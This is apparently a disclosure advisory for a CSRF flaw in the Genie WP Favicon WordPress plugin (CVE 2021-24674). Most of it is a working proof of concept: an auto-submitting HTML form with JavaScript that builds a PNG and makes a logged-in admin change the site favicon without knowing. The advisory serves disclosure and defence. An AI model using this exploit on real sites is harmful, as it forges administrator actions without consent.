Genie WP Favicon <= 0.5.2 – Arbitrary Favicon Change via CSRF | CVE 2021-24674

Description

The plugin does not have CSRF in place when updating the favicon, which could allow attackers to make a logged in admin change it via a CSRF attack

Proof of Concept

<!-- Genie WP Favicon CSRF PoC -->
<form action="http://localhost/wordpress/wp-admin/themes.php?page=gpwmf" enctype="multipart/form-data" method="POST" id="csrf">
<input type="file" hidden name="gwpf_favicon_img" id="file">
<input type="hidden" name="plugin_submitted" value="Y">
</form>
<script>
// 32x32 white png
const buf = Uint8Array.of(0x89,0x50,0x4e,0x47,0x0d,0x0a,0x1a,0x0a,0x00,0x00,0x00,0x0d,0x49,0x48,0x44,0x52,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x20,0x08,0x02,0x00,0x00,0x00,0xfc,0x18,0xed,0xa3,0x00,0x00,0x00,0x01,0x73,0x52,0x47,0x42,0x00,0xae,0xce,0x1c,0xe9,0x00,0x00,0x00,0x04,0x67,0x41,0x4d,0x41,0x00,0x00,0xb1,0x8f,0x0b,0xfc,0x61,0x05,0x00,0x00,0x00,0x09,0x70,0x48,0x59,0x73,0x00,0x00,0x1d,0x87,0x00,0x00,0x1d,0x87,0x01,0x8f,0xe5,0xf1,0x65,0x00,0x00,0x00,0x2c,0x49,0x44,0x41,0x54,0x48,0x4b,0xed,0xcd,0x31,0x01,0x00,0x30,0x0c,0x04,0xa1,0xfa,0x37,0xfd,0x95,0xc0,0x94,0xed,0x30,0xc0,0xdb,0xb1,0x02,0x2a,0xa0,0x02,0x2a,0xa0,0x02,0x2a,0xa0,0x02,0x2a,0xa0,0x02,0x2a,0xa0,0xe3,0x60,0xfb,0x8b,0x55,0xf4,0xa6,0x30,0xf7,0xda,0x7d,0x00,0x00,0x00,0x00,0x49,0x45,0x4e,0x44,0xae,0x42,0x60,0x82).buffer;
const dt = new DataTransfer;
dt.items.add(new File([buf], "csrf.png", {type: "image/png"}));
file.files = dt.files;
csrf.submit();
</script>